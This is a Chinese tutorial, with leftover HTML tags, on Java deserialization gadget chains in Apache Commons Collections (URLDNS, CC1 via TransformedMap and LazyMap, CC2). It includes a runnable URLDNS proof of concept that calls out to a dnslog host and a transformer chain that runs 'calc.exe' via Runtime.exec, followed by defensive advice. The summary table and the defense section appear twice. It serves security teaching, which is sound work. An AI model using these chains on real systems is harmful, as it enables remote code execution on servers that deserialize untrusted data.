Java反序列化漏洞利用链（CC链）深入教学文档<\/strong><\/h2>
1. 概述<\/strong><\/h3>
Java反序列化漏洞是安全领域一个经典且危害巨大的漏洞类型。当程序对用户可控的序列化数据进行反序列化时，如果攻击者能够构造恶意的序列化数据，就有可能触发一系列特定的方法调用链（Gadget Chain），最终实现远程代码执行（RCE）。<\/p>
Apache Commons Collections库（简称CC库）因其提供了一系列可以修改对象属性的“Transformer”接口和实现类，成为了构造这种利用链的“宝库”。Ysoserial工具集成了多条基于CC库的利用链，分别命名为CC1, CC2, CC3, CC4, CC5, CC6, CC7等。<\/p>
本文档将详细分析其中最核心和具有代表性的几条链：URLDNS<\/strong>、CC1（TransformedMap链和LazyMap链）<\/strong> 以及 CC2<\/strong>。<\/p>

2. 前置知识<\/strong><\/h3>
2.1 Java反序列化机制<\/strong><\/h4>

当一个类实现了 java.io.Serializable<\/code> 接口，它的对象就可以被序列化（转换成字节流）和反序列化（从字节流恢复为对象）。<\/li>
反序列化过程由 ObjectInputStream.readObject()<\/code> 方法主导。<\/li>
关键钩子<\/strong>：如果一个可序列化的类定义了具有特定签名的方法 private void readObject(ObjectInputStream in)<\/code>，那么在反序列化时，readObject<\/code> 方法会被自动调用，而不是仅仅进行默认的字段赋值。这为攻击者提供了执行复杂逻辑的入口点。<\/li> <\/ul> 2.2 Commons Collections 核心组件<\/strong><\/h4> org.apache.commons.collections.Transformer<\/code> 接口<\/strong>：只有一个方法 Object transform(Object input)<\/code>。它的作用是将一个输入对象转换成另一个输出对象。<\/li> org.apache.commons.collections.functors<\/code> 包<\/strong>：包含多个 Transformer<\/code> 的实现类，是构造利用链的“武器零件”： ConstantTransformer<\/code>：无论输入是什么，总是返回一个预设的常量对象。<\/li> InvokerTransformer<\/code>：利用Java反射，可以调用任意对象的任意方法。这是执行命令的核心。<\/li> ChainedTransformer<\/code>：将多个 Transformer<\/code> 串联起来，前一个的输出作为后一个的输入。<\/li> <\/ul> <\/li> <\/ul> 3. URLDNS 链（无依赖探测链）<\/strong><\/h3> 3.1 链子特点与用途<\/strong><\/h4> 用途<\/strong>：主要用于检测目标是否存在Java反序列化漏洞，通常作为“敲门砖”。<\/li> 特点<\/strong>：不依赖CC库<\/strong>：只使用JDK内置类，通用性极强。<\/li> 无害探测<\/strong>：利用链的最终效果是发起一次DNS查询，无法直接执行命令，但可以证明漏洞存在。<\/li> 无回显<\/strong>：通过外部的DNS日志平台（如dnslog.cn）来接收查询记录，从而确认漏洞。<\/li> <\/ol> <\/li> <\/ul> 3.2 技术原理分析<\/strong><\/h4> 核心思路是寻找一个在反序列化过程中会自动调用 hashCode()<\/code> 方法的类，并且能够连接到 URL<\/code> 类的 hashCode<\/code> 方法。<\/p> 起点：HashMap.readObject()<\/code><\/strong><\/p> HashMap<\/code> 在反序列化时，需要将其键值对重新写入。在 readObject<\/code> 方法中，会调用 hash()<\/code> 方法来计算每个键（Key）的哈希值。<\/li> hash()<\/code> 方法的实现是 (key == null) ? 0 : (h = key.hashCode())<\/code>。这意味着它会调用我们放入 HashMap<\/code> 的Key对象的 hashCode()<\/code> 方法。<\/li> <\/ul> <\/li> 关键跳转：URL.hashCode()<\/code><\/strong><\/p> java.net.URL<\/code> 类重写了 hashCode<\/code> 方法。在其方法内部，如果 hashCode<\/code> 字段为初始值 -1<\/code>，则会调用 handler.hashCode(this)<\/code>。<\/li> URLStreamHandler.hashCode(URL u)<\/code> 方法中，会调用 getHostAddress(URL u)<\/code> 方法，该方法会解析URL的主机名，从而发起DNS查询。<\/li> <\/ul> <\/li> 构造技巧与问题解决<\/strong><\/p> 直接构造 HashMap.put(new URL("http:\/\/dnslog.cn"), value)<\/code> 会在本地执行 put<\/code> 操作时就触发一次DNS查询，造成干扰。<\/li> 解决方案<\/strong>：利用反射，在 put<\/code> 之前临时修改URL对象的 hashCode<\/code> 字段为一个非 -1<\/code> 的值（如 1234<\/code>）。这样，在 put<\/code> 时，由于 hashCode<\/code> 不为 -1<\/code>，URL.hashCode()<\/code> 方法会直接返回该值，而不会解析域名。<\/li> 在序列化之前，再通过反射将 hashCode<\/code> 改回 -1<\/code>。这样，在目标服务器反序列化时，hashCode<\/code> 为 -1<\/code>，就会正常触发DNS查询。<\/li> <\/ul> <\/li> <\/ol> 3.3 完整PoC代码<\/strong><\/h4> import<\/span> java.io.*;<\/span> <\/span><\/span>import<\/span> java.lang.reflect.Field;<\/span> <\/span><\/span>import<\/span> java.net.URL;<\/span> <\/span><\/span>import<\/span> java.util.HashMap;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> URLDNS<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> \/\/ 1. 创建要探测的DNS URL <\/span><\/span><\/span><\/span> URL url =<\/span> new<\/span> URL(<\/span>"http:\/\/your-subdomain.dnslog.cn"<\/span>);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 2. 通过反射获取并修改URL的hashCode字段，避免put时触发DNS <\/span><\/span><\/span><\/span> Field hashCodeField =<\/span> URL.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"hashCode"<\/span>);<\/span> <\/span><\/span> hashCodeField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> hashCodeField.<\/span>set<\/span>(<\/span>url,<\/span> 1234<\/span>);<\/span> \/\/ 设置为一个非-1的值 <\/span><\/span><\/span><\/span> <\/span><\/span> \/\/ 3. 创建HashMap并将URL作为Key放入 <\/span><\/span><\/span><\/span> HashMap<<\/span>URL,<\/span> Integer><\/span> hashMap =<\/span> new<\/span> HashMap<>();<\/span> <\/span><\/span> hashMap.<\/span>put<\/span>(<\/span>url,<\/span> 1<\/span>);<\/span> \/\/ 此时put不会触发DNS <\/span><\/span><\/span><\/span> <\/span><\/span> \/\/ 4. 将hashCode改回-1，确保反序列化时触发 <\/span><\/span><\/span><\/span> hashCodeField.<\/span>set<\/span>(<\/span>url,<\/span> -<\/span>1<\/span>);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 5. 序列化对象到文件 <\/span><\/span><\/span><\/span> ObjectOutputStream oos =<\/span> new<\/span> ObjectOutputStream(<\/span>new<\/span> FileOutputStream(<\/span>"ser.bin"<\/span>));<\/span> <\/span><\/span> oos.<\/span>writeObject<\/span>(<\/span>hashMap);<\/span> <\/span><\/span> oos.<\/span>close<\/span>();<\/span> <\/span><\/span> <\/span><\/span> \/\/ 6. 模拟反序列化（漏洞触发点） <\/span><\/span><\/span><\/span> ObjectInputStream ois =<\/span> new<\/span> ObjectInputStream(<\/span>new<\/span> FileInputStream(<\/span>"ser.bin"<\/span>));<\/span> <\/span><\/span> ois.<\/span>readObject<\/span>();<\/span> \/\/ 此时会触发DNS查询 <\/span><\/span><\/span><\/span> ois.<\/span>close<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre> 4. CC1 链（TransformedMap 链）<\/strong><\/h3> 4.1 核心组件：TransformedMap<\/strong><\/h4> TransformedMap.decorate(Map map, Transformer keyTransformer, Transformer valueTransformer)<\/code> 方法可以包装一个普通的Map，返回一个 TransformedMap<\/code> 对象。<\/li> 当对该Map进行添加或修改操作时，会触发相应的 transform<\/code> 方法。<\/li> 关键触发点： put()<\/code> → transformValue()<\/code> → valueTransformer.transform(value)<\/code><\/li> setValue()<\/code> → checkSetValue()<\/code> → valueTransformer.transform(value)<\/code><\/li> <\/ul> <\/li> <\/ul> 4.2 寻找反序列化入口：AnnotationInvocationHandler<\/strong><\/h4> sun.reflect.annotation.AnnotationInvocationHandler<\/code> 类实现了 Serializable<\/code> 接口，并且有私有的 readObject<\/code> 方法。<\/li> 在其 readObject<\/code> 方法中，有一个循环会遍历 memberValues<\/code>（一个Map对象）的每一项，并调用其 setValue<\/code> 方法。 for<\/span> (<\/span>Map.<\/span>Entry<\/span><<\/span>String,<\/span> Object><\/span> memberValue :<\/span> memberValues.<\/span>entrySet<\/span>())<\/span> {<\/span> <\/span><\/span> String name =<\/span> memberValue.<\/span>getKey<\/span>();<\/span> <\/span><\/span> Object value =<\/span> memberValue.<\/span>getValue<\/span>();<\/span> <\/span><\/span> \/\/ ... 一些检查 ... <\/span><\/span><\/span><\/span> \/\/ 关键：这里调用了entry的setValue方法！ <\/span><\/span><\/span><\/span> memberValue.<\/span>setValue<\/span>(...);<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> 如果我们能控制 memberValues<\/code> 为精心构造的 TransformedMap<\/code>，那么 memberValue.setValue()<\/code> 实际上会调用 TransformedMap<\/code> 从父类继承的 setValue<\/code> 方法，最终触发 checkSetValue<\/code>，进而执行我们设定的 valueTransformer<\/code>。<\/li> <\/ul> 4.3 利用链构造与多态的应用<\/strong><\/h4> 构造Transformer链<\/strong>：使用 ChainedTransformer<\/code> 和 InvokerTransformer<\/code> 构造命令执行链。 Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]<\/span> {<\/span> <\/span><\/span> new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> null<\/span>}),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>null<\/span>,<\/span> null<\/span>}),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"calc.exe"<\/span>})<\/span> <\/span><\/span>};<\/span> <\/span><\/span>Transformer transformerChain =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span> <\/span><\/span><\/code><\/pre><\/li> 包装Map<\/strong>：创建一个Map，并用 TransformedMap.decorate<\/code> 进行包装，传入上述 transformerChain<\/code> 作为 valueTransformer<\/code>。<\/li> 创建AnnotationInvocationHandler实例<\/strong>：通过反射实例化 AnnotationInvocationHandler<\/code>，并将包装好的 TransformedMap<\/code> 作为其 memberValues<\/code> 参数传入。注意，传入的注解类（如 Target.class<\/code>）必须包含Map中的Key。<\/li> <\/ol> 多态的关键点<\/strong>：在 readObject<\/code> 中，memberValue<\/code> 的类型是 Map.Entry<\/code>。而我们的 TransformedMap<\/code> 中的Entry实际上是其父类 AbstractInputCheckedMapDecorator.MapEntry<\/code>。当调用 entry.setValue()<\/code> 时，由于多态，执行的是子类 TransformedMap<\/code> 所关联的父类 MapEntry<\/code> 的 setValue<\/code> 方法，该方法内部调用了 this.parent.checkSetValue(value)<\/code>，而 this.parent<\/code> 正是我们传入的 TransformedMap<\/code> 对象。这样就成功地将执行流转到了 TransformedMap<\/code> 的逻辑上。<\/p> 5. CC1 链（LazyMap 链）<\/strong><\/h3> 5.1 核心组件：LazyMap<\/strong><\/h4> LazyMap<\/code> 的 get(Object key)<\/code> 方法会在如果Key不存在于Map中时，使用预设的 Transformer<\/code> 来“懒加载”一个value并放入Map。<\/li> 触发点：LazyMap.get(key)<\/code> → this.factory.transform(key)<\/code>。<\/li> <\/ul> 5.2 引入动态代理<\/strong><\/h4> 问题：我们需要在 AnnotationInvocationHandler.readObject<\/code> 中触发 LazyMap.get<\/code>，但 readObject<\/code> 方法本身并没有直接调用 get<\/code>。<\/li> 解决方案：利用 Java动态代理<\/strong>。 AnnotationInvocationHandler<\/code> 实现了 InvocationHandler<\/code> 接口。<\/li> 我们可以创建一个Map的代理对象。当这个代理对象的任何方法被调用时，都会触发其关联的 InvocationHandler<\/code> 的 invoke<\/code> 方法。<\/li> <\/ul> <\/li> 构造流程：创建一个 LazyMap<\/code>，其 factory<\/code> 设置为恶意的 ChainedTransformer<\/code>。<\/li> 通过反射创建一个 AnnotationInvocationHandler<\/code> 实例（handler1<\/code>），其 memberValues<\/code> 是这个 LazyMap<\/code>。<\/li> 使用 Proxy.newProxyInstance<\/code> 创建一个Map的代理对象 proxyMap<\/code>，并将其 InvocationHandler<\/code> 设置为 handler1<\/code>。<\/li> 再通过反射创建第二个 AnnotationInvocationHandler<\/code> 实例（handler2<\/code>），其 memberValues<\/code> 是 proxyMap<\/code>。<\/li> 序列化 handler2<\/code>。<\/li> <\/ol> <\/li> <\/ul> 5.3 链子执行流程<\/strong><\/h4> 目标反序列化 handler2<\/code>，进入 AnnotationInvocationHandler.readObject<\/code>。<\/li> readObject<\/code> 方法中会调用 memberValues.entrySet()<\/code>。这里的 memberValues<\/code> 是 proxyMap<\/code>（代理对象）。<\/li> 调用 proxyMap.entrySet()<\/code> 会触发 handler1.invoke(...)<\/code> 方法。<\/li> 在 handler1.invoke<\/code> 方法中，会判断调用的方法名，并最终调用 this.memberValues.get(...)<\/code>。这里的 this.memberValues<\/code> 是我们最初构造的 LazyMap<\/code>。<\/li> LazyMap.get(...)<\/code> 被触发，执行恶意的 this.factory.transform(key)<\/code>，完成命令执行。<\/li> <\/ol> 此链比TransformedMap链更通用，因为它不依赖于 setValue<\/code> 这个特定的操作。<\/p> 6. CC2 链<\/strong><\/h3> 6.1 背景与特点<\/strong><\/h4> CC2链是为了在更高版本的JDK（如JDK 8u71之后）中绕过对 AnnotationInvocationHandler<\/code> 的修复而提出的。<\/li> 它使用了 org.apache.commons.collections4.comparators.TransformingComparator<\/code> 类。<\/li> <\/ul> 6.2 技术原理<\/strong><\/h4> 核心类<\/strong>：TransformingComparator<\/code> 是一个比较器，它在 compare<\/code> 方法中会调用 this.transformer.transform(object)<\/code>。<\/li> 寻找触发点<\/strong>：需要找到一个在反序列化时会调用 compare<\/code> 方法的类。常用的类是 java.util.PriorityQueue<\/code>。 PriorityQueue<\/code> 在反序列化时（readObject<\/code> 方法中），会调用 heapify()<\/code> -> siftDown()<\/code> -> siftDownUsingComparator()<\/code> -> comparator.compare()<\/code>。<\/li> <\/ul> <\/li> 构造流程<\/strong>：构造恶意的 TransformingComparator<\/code>，其 transformer<\/code> 设置为 InvokerTransformer<\/code>，用于执行命令。<\/li> 创建一个 PriorityQueue<\/code> 对象，并将其 comparator<\/code> 设置为恶意的 TransformingComparator<\/code>。<\/li> 通过反射向队列中添加必要的元素，确保比较操作能正常进行。<\/li> 序列化 PriorityQueue<\/code> 对象。<\/li> <\/ol> <\/li> <\/ul> 6.3 简化理解<\/strong><\/h4> CC2链的构造相对直接，它在一个类（PriorityQueue<\/code>）的 readObject<\/code> 逻辑内就完成了从反序列化到命令执行的整个流程，无需像CC1那样通过动态代理进行复杂的跳转。其核心就是利用队列反序列化时必然进行的排序操作，来触发我们设置的比较器中的 transform<\/code> 方法。<\/p> 7. 总结与对比<\/strong><\/h3> 利用链<\/th> 核心触发类<\/th> 关键方法<\/th> 特点与用途<\/th> <\/tr> <\/thead> URLDNS<\/strong><\/td> HashMap<\/code><\/td> readObject<\/code> -> hash()<\/code> -> URL.hashCode()<\/code><\/td> 无害探测，仅发起DNS请求，不依赖CC库。<\/td> <\/tr> CC1 (TransformedMap)<\/strong><\/td> AnnotationInvocationHandler<\/code><\/td> readObject<\/code> -> Entry.setValue()<\/code> -> TransformedMap.checkSetValue()<\/code><\/td> 经典链，利用Map的修改操作触发Transformer。<\/td> <\/tr> CC1 (LazyMap)<\/strong><\/td> AnnotationInvocationHandler<\/code><\/td> readObject<\/code> -> 动态代理 -> invoke<\/code> -> LazyMap.get()<\/code><\/td> 利用动态代理，更为灵活，是CC1的另一种实现。<\/td> <\/tr> CC2<\/strong><\/td> PriorityQueue<\/code><\/td> readObject<\/code> -> heapify()<\/code> -> compare()<\/code> -> TransformingComparator.transform()<\/code><\/td> 用于绕过高版本JDK限制，逻辑相对直接。<\/td> <\/tr> <\/tbody> <\/table> 8. 防御建议<\/strong><\/h3> 输入校验<\/strong>：对反序列化的数据源进行严格的白名单校验。<\/li> 使用安全替代方案<\/strong>：使用更安全的序列化\/反序列化机制，如JSON、Protocol Buffers等。<\/li> 升级库版本<\/strong>：及时升级Commons Collections等第三方库到安全版本（如3.2.2、4.1之后），这些版本禁用了危险的functors。<\/li> 代码层面<\/strong>：避免反序列化不可信数据。<\/li> 在 ObjectInputStream<\/code> 上重写 resolveClass<\/code> 方法，进行严格的类白名单过滤。<\/li> <\/ul> <\/li> 运行时防护<\/strong>：使用Java安全管理器（Security Manager）或第三方RASP方案进行行为监控和拦截。<\/li> <\/ol> 希望这份详尽的教学文档能帮助您深入理解Java反序列化漏洞的原理和CC利用链的构造技巧。学习这些知识的目的在于更好地进行安全防御和代码审计。<\/p>

利用链<\/th>	核心触发类<\/th>	关键方法<\/th>	特点与用途<\/th> <\/tr> <\/thead>
URLDNS<\/strong><\/td>	`HashMap<\/code><\/td>`	`readObject<\/code> -> hash()<\/code> -> URL.hashCode()<\/code><\/td>`	无害探测，仅发起DNS请求，不依赖CC库。<\/td> <\/tr>
CC1 (TransformedMap)<\/strong><\/td>	`AnnotationInvocationHandler<\/code><\/td>`	`readObject<\/code> -> Entry.setValue()<\/code> -> TransformedMap.checkSetValue()<\/code><\/td>`	经典链，利用Map的修改操作触发Transformer。<\/td> <\/tr>
CC1 (LazyMap)<\/strong><\/td>	`AnnotationInvocationHandler<\/code><\/td>`	`readObject<\/code> -> 动态代理 -> invoke<\/code> -> LazyMap.get()<\/code><\/td>`	利用动态代理，更为灵活，是CC1的另一种实现。<\/td> <\/tr>
CC2<\/strong><\/td>	`PriorityQueue<\/code><\/td>`	`readObject<\/code> -> heapify()<\/code> -> compare()<\/code> -> TransformingComparator.transform()<\/code><\/td>`	用于绕过高版本JDK限制，逻辑相对直接。<\/td> <\/tr> <\/tbody> <\/table> 8. 防御建议<\/strong><\/h3> 输入校验<\/strong>：对反序列化的数据源进行严格的白名单校验。<\/li> 使用安全替代方案<\/strong>：使用更安全的序列化\/反序列化机制，如JSON、Protocol Buffers等。<\/li> 升级库版本<\/strong>：及时升级Commons Collections等第三方库到安全版本（如3.2.2、4.1之后），这些版本禁用了危险的functors。<\/li> 代码层面<\/strong>：避免反序列化不可信数据。<\/li> 在 `ObjectInputStream<\/code> 上重写 resolveClass<\/code> 方法，进行严格的类白名单过滤。<\/li> <\/ul> <\/li>` `运行时防护<\/strong>：使用Java安全管理器（Security Manager）或第三方RASP方案进行行为监控和拦截。<\/li> <\/ol> 希望这份详尽的教学文档能帮助您深入理解Java反序列化漏洞的原理和CC利用链的构造技巧。学习这些知识的目的在于更好地进行安全防御和代码审计。<\/p>`